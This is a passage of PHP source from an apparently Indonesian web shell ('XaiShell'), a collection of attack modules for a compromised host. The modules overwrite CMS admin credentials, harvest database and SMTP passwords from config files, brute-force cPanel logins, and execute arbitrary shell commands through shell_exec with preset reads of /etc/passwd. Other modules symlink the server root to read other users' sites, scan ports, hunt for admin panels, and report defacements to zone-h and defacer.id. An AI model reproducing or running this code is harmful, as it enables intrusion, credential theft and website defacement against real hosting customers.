$url_target2 = "
Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokom
edia/adminweb</u></a><br>";
} else {
$url_target2 = "
Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=wh
ite>gatau admin login nya dimana :p</font> ]<br>";
}
}
} else {
$cek_login = file_get_contents("
$target/adminweb/");
$cek_login2 = file_get_contents(
"$target/lokomedia/adminweb/");
if(preg_match("/CMS Lokomedia|Ad
ministrator/", $cek_login)) {
$url_target = "Login =>
<a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
} elseif(preg_match("/CMS Lokome
dia|Lokomedia/", $cek_login2)) {
$url_target = "Login =>
<a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminw
eb</u></a><br>";
} else {
$url_target = "Login =>
<a href='$target' target='_blank'><u>$target</u></a> [ <font color=white>gatau a
dmin login nya dimana :p</font> ]<br>";
}
}
$update = mysql_query("UPDATE $prefix SE
T username='$user_baru',password='$pass_baru' WHERE level='admin'");
echo "Config => ".$file_conf."<br>";
echo "CMS => Lokomedia<br>";
if(preg_match('/error, gabisa ambil nama
domain nya/', $url_target)) {
echo $url_target2;
} else {
echo $url_target;
}
if(!$update OR !$conn OR !$db) {
echo "Status => <font color=red>
".mysql_error()."</font><br><br>";
} else {
echo "Status => <font color=lime
>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
}
mysql_close($conn);
}
}
}
} else {
echo "<center>
<h1>Auto Edit User Config</h1>
<form method='post'>
DIR Config: <br>
<input type='text' size='50' name='config_dir' value='$dir'><br>
<br>
Set User & Pass: <br>

<input type='text' name='user_baru' value='jonathan' placeholder


='user_baru'><br>
<input type='text' name='pass_baru' value='miles' placeholder='p
ass_baru'><br>
<input type='submit' name='hajar' value='Hajar!' style='width: 2
15px;'>
</form>
</span><br>
";
}
} elseif($_GET['do'] == 'cpanel') {
if($_POST['crack']) {
$usercp = explode("\r\n", $_POST['user_cp']);
$passcp = explode("\r\n", $_POST['pass_cp']);
$i = 0;
foreach($usercp as $ucp) {
foreach($passcp as $pcp) {
if(@mysql_connect('localhost', $ucp, $pcp)) {
if($_SESSION[$ucp] && $_SESSION[$pcp]) {
} else {
$_SESSION[$ucp] = "1";
$_SESSION[$pcp] = "1";
if($ucp == '' || $pcp == '') {
} else {
$i++;
if(function_exists('posi
x_getpwuid')) {
$domain_cp = fil
e_get_contents("/etc/named.conf");
if($domain_cp ==
'') {
$dom =
"<font color=red>gabisa ambil nama domain nya</font>";
} else {
preg_mat
ch_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
foreach(
$domains_cp[1] as $dj) {
$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_cp_url = $user_cp_url['name'];
if($user_cp_url == $ucp) {
$dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
break;
}
}
}
} else {
$dom = "<font co
lor=red>function is Disable by system</font>";
}
echo "username (<font co
lor=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>"
;

}
}
}
}
}
if($i == 0) {
} else {
echo "<br>sukses nyolong ".$i." <font color=lime>.</font
>";
}
} else {
echo "<center>
<form method='post'>
USER: <br>
<textarea style='width: 450px; height: 150px;' name='user_cp'>";
$_usercp = fopen("/etc/passwd","r");
while($getu = fgets($_usercp)) {
if($getu == '' || !$_usercp) {
echo "<font color=red>Can't read /etc/passwd</fo
nt>";
} else {
preg_match_all("/(.*?):x:/", $getu, $u);
foreach($u[1] as $user_cp) {
if(is_dir("/home/$user_cp/public
_html")) {
echo "$user_cp\n";
}
}
}
}
echo "</textarea><br>
PASS: <br>
<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
function cp_pass($dir) {
$pass = "";
$dira = scandir($dir);
foreach($dira as $dirb) {
if(!is_file("$dir/$dirb")) continue;
$ambil = file_get_contents("$dir/$dirb");
if(preg_match("/WordPress/", $ambil)) {
$pass .= ambilkata($ambil,"DB_PASSWORD',
'","'")."\n";
} elseif(preg_match("/JConfig|joomla/", $ambil))
{
$pass .= ambilkata($ambil,"password = '"
,"'")."\n";
} elseif(preg_match("/Magento|Mage_Core/", $ambi
l)) {
$pass .= ambilkata($ambil,"<password><![
CDATA[","]]></password>")."\n";
} elseif(preg_match("/panggil fungsi validasi xs
s dan injection/", $ambil)) {
$pass .= ambilkata($ambil,'password = "'
,'"')."\n";
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|D
IR_CONFIG|DIR_SYSTEM/", $ambil)) {
$pass .= ambilkata($ambil,"'DB_PASSWORD'
, '","'")."\n";
} elseif(preg_match("/^[client]$/", $ambil)) {
preg_match("/password=(.*?)/", $ambil, $

pass1);
if(preg_match('/"/', $pass1[1])) {
$pass1[1] = str_replace('"', "",
$pass1[1]);
$pass .= $pass1[1]."\n";
} else {
$pass .= $pass1[1]."\n";
}
} elseif(preg_match("/cc_encryption_hash/", $amb
il)) {
$pass .= ambilkata($ambil,"db_password =
'","'")."\n";
}
}
echo $pass;
}
$cp_pass = cp_pass($dir);
echo $cp_pass;
echo "</textarea><br>
<input type='submit' name='crack' style='width: 450px;' value='C
rack'>
</form>";
}
}elseif($_GET['do'] == 'defacerid') {
echo "<center><form method='post'>
<u>Defacer</u>: <br>
<input type='text' name='hekel' size='50' value='Fuck'><br>
<u>Team</u>: <br>
<input type='text' name='tim' size='50' value='Global Network'><
br>
<u>Domains</u>: <br>
<textarea style='width: 450px; height: 150px;' name='sites'></te
xtarea><br>
<input type='submit' name='go' value='Submit' style='width: 450p
x;'>
</form>";
$site = explode("\r\n", $_POST['sites']);
$go = $_POST['go'];
$hekel = $_POST['hekel'];
$tim = $_POST['tim'];
if($go) {
foreach($site as $sites) {
$zh = $sites;
$form_url = "https://www.defacer.id/notify";
$data_to_post = array();
$data_to_post['attacker'] = "$hekel";
$data_to_post['team'] = "$tim";
$data_to_post['poc'] = 'SQL Injection';
$data_to_post['url'] = "$zh";
$curl = curl_init();
curl_setopt($curl,CURLOPT_URL, $form_url);
curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Window
s NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://s
earch.msn.com/msnbot.htm)
curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
$result = curl_exec($curl);
echo $result;

curl_close($curl);
echo "<br>";
}
}
} elseif($_GET['do'] == 'smtp') {
echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <
u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><b
r>";
function scj($dir) {
$dira = scandir($dir);
foreach($dira as $dirb) {
if(!is_file("$dir/$dirb")) continue;
$ambil = file_get_contents("$dir/$dirb");
$ambil = str_replace("$", "", $ambil);
if(preg_match("/JConfig|joomla/", $ambil)) {
$smtp_host = ambilkata($ambil,"smtphost = '","'"
);
$smtp_auth = ambilkata($ambil,"smtpauth = '","'"
);
$smtp_user = ambilkata($ambil,"smtpuser = '","'"
);
$smtp_pass = ambilkata($ambil,"smtppass = '","'"
);
$smtp_port = ambilkata($ambil,"smtpport = '","'"
);
$smtp_secure = ambilkata($ambil,"smtpsecure = '"
,"'");
echo "SMTP Host: <font color=lime>$smtp_host</fo
nt><br>";
echo "SMTP port: <font color=lime>$smtp_port</fo
nt><br>";
echo "SMTP user: <font color=lime>$smtp_user</fo
nt><br>";
echo "SMTP pass: <font color=lime>$smtp_pass</fo
nt><br>";
echo "SMTP auth: <font color=lime>$smtp_auth</fo
nt><br>";
echo "SMTP secure: <font color=lime>$smtp_secure
</font><br><br>";
}
}
}
$smpt_hunter = scj($dir);
echo $smpt_hunter;
} elseif($_GET['do'] == 'zoneh') {
?>
<br><br><center>
<!-- Zone-H -->
<form action="" method='POST'><table><table class='tabnet'><tr>
<td style='background-color:#0000;padding-left:10px;'><tr><tr><th colspan="2"><h
2>Zone-H Defacer</h2></th></tr></td></tr><tr><td height='45' colspan='2'><form m
ethod="post">
<input type="text" class="inputz" name="defacer" value="Jonathan Miles" />
<select name="hackmode" class="inputz" >
<option >------------------------Pilih Salah Satu------------------------</optio
n>
<option value="1">known vulnerability (i.e. unpatched system)</option>
<option value="2" >undisclosed (new) vulnerability</option>
<option value="3" >configuration / admin. mistake</option>

<option value="4" >brute force attack</option>


<option value="5" >social engineering</option>
<option value="6" >Web Server intrusion</option>
<option value="7" >Web Server external module intrusion</option>
<option value="8" >Mail Server intrusion</option>
<option value="9" >FTP Server intrusion</option>
<option value="10" >SSH Server intrusion</option>
<option value="11" >Telnet Server intrusion</option>
<option value="12" >RPC Server intrusion</option>
<option value="13" >Shares misconfiguration</option>
<option value="14" >Other Server intrusion</option>
<option value="15" >SQL Injection</option>
<option value="16" >URL Poisoning</option>
<option value="17" >File Inclusion</option>
<option value="18" >Other Web Application bug</option>
<option value="19" >Remote administrative panel access bruteforcing</option>
<option value="20" >Remote administrative panel access password guessing</option
>
<option value="21" >Remote administrative panel access social engineering</optio
n>
<option value="22" >Attack against administrator(password stealing/sniffing)</op
tion>
<option value="23" >Access credentials through Man In the Middle attack</option>
<option value="24" >Remote service password guessing</option>
<option value="25" >Remote service password bruteforce</option>
<option value="26" >Rerouting after attacking the Firewall</option>
<option value="27" >Rerouting after attacking the Router</option>
<option value="28" >DNS attack through social engineering</option>
<option value="29" >DNS attack through cache poisoning</option>
<option value="30" >Not available</option>
</select>
<select name="reason" class="inputz" >
<option >-------------Pilih Salah Satu---------------</option>
<option value="1" >Heh...just for fun!</option>
<option value="2" >Revenge against that website</option>
<option value="3" >Political reasons</option>
<option value="4" >As a challenge</option>
<option value="5" >I just want to be the best defacer</option>
<option value="6" >Patriotism</option>
<option value="7" >Not available</option>
</select>
<input type="hidden" name="action" value="zone">
<center><textarea style="background:black;outline:none;" name="domain" cols="116
" rows="9" id="domains"></textarea>
<br /><input class='inputzbut' type="submit" value="Send Now !" name="SendNowToZ
oneH" /><br></center></table>
</form></td></tr></table></form>
<!-- End Of Zone-H -->
</td></center><br><br>
<?php
echo '<center>';
ob_start();{
$sub = get_loaded_extensions();
if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');}
$hacker = $_POST['defacer'];
$method = $_POST['hackmode'];
$neden = $_POST['reason'];
$site = $_POST['domain'];

if (empty($hacker)){die ("[-] You Must Fill the Attacker name !");}


elseif($method == "--------SELECT--------") {die("[-] You Must Select Th
e Method !");}
elseif($neden == "--------SELECT--------") {die("[-] You Must Select The
Reason");}
elseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");}
$i = 0;
$sites = explode("\n", $site);
while($i < count($sites))
{
if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$
sites[$i];}
ZoneH("http://zone-h.org/notify/single", $hacker, $method, $nede
n, $sites[$i]);
echo "Site : ".$sites[$i]." Defaced !\n";
++$i;
}
echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
echo '</center>';
}
} elseif($_GET['do'] == 'adminer') {
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
function adminer($url, $isi) {
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if(file_exists('adminer.php')) {
echo "<center><font color=lime><a href='$full/adminer.php' targe
t='_blank'>-> adminer login <-</a></font></center>";
} else {
if(adminer("https://www.adminer.org/static/download/4.2.4/admine
r-4.2.4.php","adminer.php")) {
echo "<center><font color=lime><a href='$full/adminer.ph
p' target='_blank'>-> adminer login <-</a></font></center>";
} else {
echo "<center><font color=white>gagal buat file adminer<
/font></center>";
}
}
} elseif($_GET['do'] == 'bypass') {
echo "<center/><br/><b><font color=#00ff00>-=[ Command Bypass Exploit ]=-</font
></b><br>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=#00ff00><b><font color="#00ff00">Command :=) </font></font></b><
input name="baba" type="text" class="inputz" size="34"><input type="submit" clas
s="inputzbut" value="Go">

</form>
<form method="POST" action=""><strong><b><font color="#00ff00">Menu Bypass :=)
</font></strong><select name="liz0" size="1" class="inputz">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">netstat</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</optio
n>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</optio
n>
</select> <input type="submit" class="inputzbut" value="G&ouml;">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
$liz0=shell_exec($_POST[baba]);
$liz0zim=shell_exec($_POST[liz0]);
$uid=shell_exec('id');
$server=shell_exec('uname -a');
echo "<pre><h4>";
echo $liz0;
echo $liz0zim;
echo "</h4></pre>";
"</div>";
}
elseif($_GET['do'] == 'csrfup')
{
echo '<html>
<center><h1 style="font-size:33px;">CSRF Exploiter Online</h1><br><br>
<font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles
/ file / ajaxfup / files[] / qqfile / userfile / etc</font>
<br><br>
<form method="post" style="font-size:25px;">
URL: <input type="text" name="url" size="50" height="10" placeholder="http://www
.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" requir
ed><br>
POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat
diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
<input type="submit" name="d" value="Lock!">
</form>';
$url = $_POST["url"];
$pf = $_POST["pf"];
$d = $_POST["d"];
if($d) {
echo "<form method='post' target='_blank' action='$url' enctype='multipa
rt/form-data'><input type='file' name='$pf'><input type='submit' name='g' value=
'Upload'></form></form>
</html>";
}
} elseif($_GET['do'] == 'ende'){
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$text = $_POST['asoe'];
?>
<title>Tools Auto Encoded/Decoded</title>

<body >
<STYLE>
body,td,th {background:#151515;];background:#151515;background-size:100%;
background-repeat: no-repeat;font-family: Verdana;font-size: 12px;color: #00FF00
;font-weight: bold;
background-attachment:fixed;}
</STYLE>
<center>
<br>
Code<font size="7" face="chiller" color="blue" style="text-shadow: 0 0 6px #FF00
00, 0 0 5px #FF0000, 0 0 5px #FF0000;"><font style="opacity:0.40;"></font><br>
<form method="post"><br>
<textarea class='inputz' cols=30 rows=5 name="asoe" style="background:transparen
t;color:aqua;"></textarea><br><br>
<select class='inputz' size="1" name="ope" style="background:white;color:aqua;">
<option style='background:transparent;color:aqua;'><center>[#] Encryption [#]</o
ption>
<option value="urlencode" style='background:transparent;color:aqua;'>url</option
>
<option value="base64" style='background:transparent;color:aqua;'>Base64</option
>
<option value="ur" style='background:transparent;color:aqua;'>convert_uu</option
>
<option value="json" style='background:transparent;color:aqua;'>json</option>
<option value="gzinflates" style='background:transparent;color:aqua;'>gzinflate
- base64</option>
<option value="str2" style='background:transparent;color:aqua;'>str_rot13 - base
64</option>
<option value="gzinflate" style='background:transparent;color:aqua;'>str_rot13 gzinflate - base64</option>
<option value="gzinflater" style='background:transparent;color:aqua;'>gzinflate
- str_rot13 - base64</option>
<option value="gzinflatex" style='background:transparent;color:aqua;'>gzinflate
- str_rot13 - gzinflate - base64</option>
<option value="gzinflatew" style='background:transparent;color:aqua;'>str_rot13
- convert_uu - url - gzinflate - str_rot13 - base64 - convert_uu - gzinflate - u
rl - str_rot13 - gzinflate - base64</option>
<option value="str" style='background:transparent;color:aqua;'>str_rot13 - gzinf
late - str_rot13 - base64</option>
<option value="url" style='background:transparent;color:aqua;'>base64 - gzinflat
e - str_rot13 - convert_uu - gzinflate - base64</option>
<option value="hexencode" style='background:transparent;color:aqua;'>Hex Encode/
Decode</option>
<option value="md5" style='background:transparent;color:aqua;'><center>MD5 Hash<
/option>
<option value="sha1" style='background:transparent;color:aqua;'>SHA1 Hash</optio
n>
<option value="str_rot13" style='background:transparent;color:aqua;'>ROT13 Hash<
/option>
<option value="strlen" style='background:transparent;color:aqua;'>strlen</option
>
<option value="xxx" style='background:transparent;color:aqua;'>unescape</option>
<option value="bbb" style='background:transparent;color:aqua;'>charAt</option>
<option value="aaa" style='background:transparent;color:aqua;'>chr - bin2hex - s
ubstr</option>
<option value="www" style='background:transparent;color:aqua;'>chr</option>
<option value="sss" style='background:transparent;color:aqua;'>htmlspecialchars<
/option>
<option value="eee" style='background:transparent;color:aqua;'>escape</option></
select><br><input class='inputzbut' type='submit' name='submit' value='Encode' s

tyle="background:transparent;color:aqua;">
<input class='inputzbut' type='submit' name='crack' value='Decode' style="backgr
ound:transparent;color:aqua;"><br>
</select>&nbsp;
</form>
<?php
$submit = $_POST['submit'];
if (isset($submit)){
$op = $_POST["ope"];
switch ($op) {case 'base64': $codi=base64_encode($text);
break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))))
;
break;case 'json' : $codi=json_encode(utf8_encode($text));
break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($tex
t))));
break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(g
zdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(raw
urldecode(str_rot13($text))))))))))));
break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
break;case 'str2' : $codi=base64_encode(str_rot13($text));
break;case 'urlencode' : $codi=rawurlencode($text);
break;case 'hexencode' : $codi=bin2hex($text);
break;case 'md5' : $codi=md5($text);
break;case 'ur' : $codi=convert_uuencode($text);
break;case 'str_rot13' : $codi=str_rot13($text);
break;case 'sha1' : $codi=sha1($text);
break;case 'strlen' : $codi=strlen($text);
break;case 'xxx' : $codi=strlen(bin2hex($text));
break;case 'bbb' : $codi=htmlentities(utf8_decode($text));
break;case 'aaa' : $codi=chr(bin2hex(substr($text)));
break;case 'www' : $codi=chr($text);
break;case 'sss' : $codi=htmlspecialchars($text);
break;case 'eee' : $codi=addslashes($text);
break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzde
flate(base64_encode($text))))));
break;default:break;}}
$submit = $_POST['crack'];
if (isset($submit)){
$op = $_POST["ope"];
switch ($op) {case 'base64': $codi=base64_decode($text);
break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))))
;
break;case 'json' : $codi=utf8_dencode(json_dencode($text));
break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($tex
t))));
break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflat
e(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzin
flate(base64_decode($text))))))))))));
break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
break;case 'str2' : $codi=str_rot13(base64_decode($text));
break;case 'urlencode' : $codi=rawurldecode($text);
break;case 'hexencode' : $codi=quoted_printable_decode($text);
break;case 'ur' : $codi=convert_uudecode($text);
break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzin
flate(base64_decode(($text)))))));

break;default:break;}}
$html = htmlentities(stripslashes($codi));
echo "<from><center><h3><font size=4 face=chiller color=aqua>Result</h3></center
><textarea cols=70 rows=20 style='onfocus();font-weight:bold;color:red;backgroun
d-image: transparent;opacity:0.40;background-size:100%;background-repeat: no-rep
eat;' class='inputz' readonly>".$html."</textarea><BR/><BR/></center></from>";
?>
<footer style="text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000; p
osition:fixed; left:1px; right:0px; top:0px; border-bottom: 1px solid white ;">
<center><b><font face="Quicksand" color="black" size="3" style="text-shadow: 0 0
5px #2f2b2b, 0 0 10px #2f2b2b, 0 0 20px #2f2b2b, 0 0 45px #2f2b2b, 0 0 40px #2f
2b2b;">
<font face="Agency FB" color="blue" size="4" style="text-shadow: 0 0 6px black,
0 0 5px black, 0 0 5px black;">
<center><font color="blue" size="4" face="Agency FB"></FONT></footer></html>
<?php
} elseif($_GET['do'] == 'symlink')
{
@set_time_limit(0);
echo "<br><br><center><h1>Symlink by XaiShell</h1></center><br><br><center><div
class=content>";
@mkdir('sym',0777);
$htaccess = "Options all n DirectoryIndex Sux.html n AddType text/plain .php n
AddHandler server-parsed .php n AddType text/plain .html n AddHandler txt .html
n Require None n Satisfy Any";
$write =@fopen ('sym/.htaccess','w');
fwrite($write ,$htaccess);
@symlink('/','sym/root');
$filelocation = basename(__FILE__);
$read_named_conf = @file('/etc/named.conf');
if(!$read_named_conf)
{
echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server ->
[ /etc/named.conf ]</pre></center>";
}
else
{
echo "<br><br><div class='tmp'><table border='1' bordercolor='blue' width='500'
cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>"
;
foreach($read_named_conf as $subject){
if(eregi('zone',$subject)){
preg_match_all('#zone "(.*)"#',$subject,$string);
flush();
if(strlen(trim($string[1][0])) >2){
$UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
$name = $UID['name'] ;
@symlink('/','sym/root');
$name = $string[1][0];
$iran = '.ir';
$israel = '.il';
$indo = '.id';
$sg12 = '.sg';
$edu
= '.edu';
$gov
= '.gov';
$gose = '.go';
$gober = '.gob';
$mil1 = '.mil';

$mil2
$malay
$china
$japan
$austr
$porn
$as
$calfn

=
=
=
=
=
=
=
=

'.mi';
'.my';
'.cn';
'.jp';
'.au';
'.xxx';
'.uk';
'.ca';

if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$in


do",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]
) or eregi ("$gov",$string[1][0])
or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil
1",$string[1][0]) or eregi ("$mil2",$string[1][0])
or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$ja
pan",$string[1][0]) or eregi ("$austr",$string[1][0])
or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn"
,$string[1][0]))
{
$name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px blue; '>".$strin
g[1][0].'</div>';
}
echo "
<tr>
<td>
<div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.'
</a> </div>
</td>
<td>
'.$UID['name']."
</td>
<td>
<a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a
>
</td>
</tr></div> ";
flush();
}
}
}
}
}elseif($_GET['do'] == 'ports') {
echo '<table><tr><th><center><u>Port Scanner</u></tr></th></center><td>';
echo '<div class="content">';
echo '<form action="" method="post">';
if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['
start'])){
$start = strip_tags($_POST['start']);
$end = strip_tags($_POST['end']);
$host = strip_tags($_POST['host']);
for($i = $start; $i<=$end; $i++){
$fp = @fsockopen($host, $i, $errno, $errstr, 3);
if($fp){
echo 'Port '.$i.' is <font color=blue>open</font><br>';
}

flush();
}
} else {
echo '<br /><br /><center><input type="hidden" name="a" value="PortScann
er"><input type="hidden" name=p1><input type="hidden" name="p2">
<input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['
cwd']).'">
<input type="hidden" name="charset" value="'.(isset($_POST['charse
t'])?$_POST['charset']:'').'">
Host: <input type="text" name="host" value="localhost"/><br /><br
/>
Port start: <input type="text" name="start" value="0"/><br /><br /
>
Port end:<input type="text" name="end" value="5000"/><br /><br />
<input type="submit" value="Scan Ports" />
</form></center><br /><br />';
echo '</div></table></td>';
}
} elseif($_GET['do'] == 'dorker') {?>
<html>
<head>
<title>Bing Grabber</title>
<style type="text/css">
textarea {
width: 500px;
height: 250px;
border: 1px solid #000000;
margin: 5px auto;
padding: 7px;
}
input[type=text] {
padding-left: 7px;
width: 250px;
height: 25px;
border: 1px solid #000000;
background: blue;
margin: 5px auto;
}
input[type=submit] {
height: 25px;
border: 1px solid #000000;
background: green;
margin: 5px auto;
color: #000000;
}
</style>
</head>
<center><form method="post">
<font color=white>Bing Dork: <input type="text" name="dork" placeholder="dork" r
equired>
<input type="submit" name="go" value=">>">
</form>
<?php
function getsource($url, $proxy) {
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
if($proxy) {
$proxy = explode(':', autoprox());
curl_setopt($curl, CURLOPT_PROXY, $proxy[0]);

curl_setopt($curl, CURLOPT_PROXYPORT, $proxy[1]);


}
$content = curl_exec($curl);
curl_close($curl);
return $content;
}
$dork = htmlspecialchars($_POST['dork']);
$do = urlencode($dork);
if(isset($_POST['go'])) {
$npage = 1;
$npages = 30000;
$allLinks = array();
$lll = array();
while($npage <= $npages) {
$x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage.
"", $proxy);
if($x) {
preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
$npage = $npage + 10;
if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) =
= 0) break;
} else break;
}
$URLs = array();
foreach($allLinks as $url){
$exp = explode("/", $url);
$URLs[] = $exp[2];
}
$array = array_filter($URLs);
$array = array_unique($array);
$sss = count(array_unique($array));
echo "ToTaL SiTe : $sss<br>";
foreach($array as $domain) {
echo "http://$domain/<br>";
}
}
} elseif($_GET['do'] == 'cms_detector') {
echo '<br><br><br><br><center><b><font size=4>+--=[ CMS Detector ]=--+</font></b
></center><br><br>';
if(!file_exists('pee.tmp')){
@fopen('pee.tmp', 'w');
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4
" class="td1">';
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></
td><td><center><b>CMS</b></center></td></table>';
$p = 0;
if(is_readable("/var/named")){
$list = scandir("/var/named");
$current_dir = posix_getcwd();
$dir = explode("/",$current_dir);
foreach($list as $domain){
if(strpos($domain,".db"))
{
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));

error_reporting(0);
$link = $pageURL.'pee/'.$owner['name'];
cms_add($link,$domain,$owner['name'],"WordPress");
cms_add($link,$domain,$owner['name'],"Joomla");
cms_add($link,$domain,$owner['name'],"vBulletin");
cms_add($link,$domain,$owner['name'],"WHMCS");
cms_add($link,$domain,$owner['name'],"PhpBB");
cms_add($link,$domain,$owner['name'],"MyBB");
cms_add($link,$domain,$owner['name'],"IPB");
cms_add($link,$domain,$owner['name'],"SMF");
cms_add($link,$domain,$owner['name'],"Drupal");
cms_add($link,$domain,$owner['name'],"e107");
cms_add($link,$domain,$owner['name'],"Seditio");
cms_add($link,$domain,$owner['name'],"osCommerce");
}
}
}
}else{
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4
" class="td1">';
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></
td><td><center><b>CMS</b></center></td></table><br><br>';
$content = file_get_contents($pageURL.'pee.tmp');
echo $content;
}
} elseif($_GET['do'] == 'admf') {
?>
<type='text/javascript'/></script>
<style>
body {cursor:cross; no-repeat center center fixed;
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover; }
a{ text-decoration:none; color:white;}
</style>
</head>
<link rel="SHORTCUT ICON" href="http://i.imgur.com/2Koa43H.png">
</style>
<br>
<br>
<br>
<td width=100% id=Gretz>
<form action="" method="post">
<center><p class="frontboxtext"><input name="hash_lol" class="textbox" type="tex
t" size="30" value="http://www.target.co.il/"/>
<input name="submit_lol" class="textbox" value="Submit Site" type="submit">
</form>
<?php
set_time_limit(0);
if (isset($_POST["submit_lol"])) {
$url = $_POST['hash_lol'];
echo "<br />Crot ".$url."<br /><br />";

$adminlocales = array("-adminweb/","!adminweb/","@adminweb/","adminweb121/","adm
inweb90/","adminweb145/","khususadmin/","rahasiaadm/","adminweb123123/","adminwe
b2222/","adminlanel/","adminlanel.php/","monitor123.php/","masuk.php/","css.php/
", "admin1235.php/", "master.php/","1admin/","123admin/","addmin/","home.php","c
ss/","rediect.php/","masuk.php/","index.php/","webpaneladmin123/","registeradm/"
,"register/","member123/","123adminweb/","123paneladminweb/","panelauth1231/","l
oginadminweb21/","loginadminweb123/","loginadminweb/","webadmin123/","redakturad
min/","paneladminweb/","admloginadm/","4dm1n/","admin12345/","adminweb12/","admi
nweb111/","adminweb123/","adminweb1/","gangmasuk/","gangadmin/","admredaktur/","
adminwebredaktur/","adminredaktur/","adm/", "_adm_/", "_admin_/", "_loginadm_/",
"_login_admin_/", "minmin", "loginadmin3/", "masuk/admin", "webmail", "_logina
dmin_/", "_login_admin.php_/", "_admin_/", "_administrator_/", "operator/", "sik
a/", "adminweb/", "develop/", "ketua/", "redaktur/", "author/", "admin/", "admin
